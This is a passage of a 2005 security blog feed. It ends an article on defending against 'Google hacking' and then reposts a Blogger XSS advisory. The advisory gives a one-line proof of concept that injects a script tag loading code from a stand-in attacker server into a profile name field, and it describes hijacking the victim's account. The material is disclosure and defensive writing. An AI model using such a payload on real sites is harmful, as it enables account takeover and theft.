page at ( &lt;a href="http://www.google.com/addurl.html"&gt;http://www.google.com/addurl.html&lt;/a&gt; ). Google automatically accesses it, stores the resulting data in its searchable cache, and the rest is history.
&lt;br /&gt;SECURING AGAINST GOOGLE EXPLOITS&lt;br /&gt;This probably doesn't even have to be mentioned at this point, but make sure you are comfortable with sharing everything in your public web folder with the whole world, because Google will share it, whether you like it or not. Also, in order to prevent attackers from easily figuring out what server software you are running, change the default error messages and other identifiers. Often, when a "404 Not Found" error is detected, servers will return a page like this:&lt;br /&gt;quote:&lt;br /&gt;Not Found&lt;br /&gt;The requested URL /cgi-bin/xxxxxx was not found on this server.&lt;br /&gt;Apache/1.3.27 Server at &lt;a href="http://www.countrybookshop.co.uk/"&gt;www.countrybookshop.co.uk&lt;/a&gt; Port 80&lt;br /&gt;The only information that the legitimate user really needs is on the top line, and restricting the other information will prevent your page from turning up in an attacker's search for a specific flavour of server.&lt;br /&gt;The Google cache issue raises another interesting security concern: just because you take a document off your site doesn't mean it's inaccessible. Google periodically purges its cache, but until then your sensitive files are still being happily offered to the public. If you realize that the search engine has cached files which you want to be unavailable, go to ( &lt;a href="http://www.google.com/remove.html"&gt;http://www.google.com/remove.html&lt;/a&gt; ) and follow the instructions to remove your page, or parts of your page, from their database.&lt;br /&gt;There is not really anything that an administrator can do to prevent the use of Google as a proxy, so the best thing to do is ensure that your system is not vulnerable to any HTTP attacks that could be conducted through Google. A good HTTP vulnerability scanning tool is N-Stealth ( &lt;a href="http://www.nstalker.com/nstealth/"&gt;http://www.nstalker.com/nstealth/&lt;/a&gt; ). 
Run this against your network, and it will hopefully point out any holes that you need to patch up.&lt;br /&gt;OTHER RESOURCES&lt;br /&gt;There are many, many variations on the Google hacking techniques described here. An excellent place to find out more about these exploits is ( &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com/&lt;/a&gt; ). ( &lt;a href="http://www.oxygen-inc.com/google.html"&gt;http://www.oxygen-inc.com/google.html&lt;/a&gt; ) also contains a pretty good tutorial specifically focusing on how to find sensitive information using Google.&lt;br /&gt;Hope this information is useful!&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730843292292000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730843292292000' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730843292292000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730843292292000'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-as-hacking-tool.html' title='Google as a Hacking Tool'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' 
src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110714890542322431</id><published>2005-01-31T13:18:00.000+08:00</published><updated>2005-01-31T13:21:45.423+08:00</updated><title type='text'>BLOGGER XSS VULNERABILITY</title><content type='html'>XSS DETAILS;&lt;br /&gt;There is no HTML filter when rendering user profiles, so anyone can inject a script into a profile's "First Name", "Last Name", etc. If you inject code into "First Name", it will be printed and run on the user's first page [www.blogger.com], so an attacker can easily gain the victim's account.&lt;br /&gt;Proof Of Concept;&lt;br /&gt;Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] into the victim's "First Name". Now you can execute anything remotely. After logging in as your victim:&lt;br /&gt;I. You can change the password (without the old password)&lt;br /&gt;II. You can change the e-mail address without any confirmation&lt;br /&gt;III. 
You can own the victim's blogs&lt;br /&gt;*Replace ][,&lt;&gt;&lt;br /&gt;*Script injection is limited to 50 characters (but that is quite enough to add a JS script)&lt;br /&gt;HISTORY;&lt;br /&gt;Discovered : 2/22/2004&lt;br /&gt;Vendor Informed : 2/25/2004&lt;br /&gt;Published : 3/26/2004&lt;br /&gt;VENDOR STATUS;&lt;br /&gt;Contact established with Google but there is no answer.&lt;br /&gt;Ferruh Mavituna&lt;br /&gt;Web Application Security Specialist&lt;br /&gt;&lt;a href="http://ferruh.mavituna.com/"&gt;http://ferruh.mavituna.com&lt;/a&gt;&lt;br /&gt;ferruh[at]mavituna.com&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110714890542322431/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110714890542322431' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110714890542322431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110714890542322431'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/01/blogger-xss-vulnerability_30.html' title='BLOGGER XSS VULNERABILITY'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry></feed>
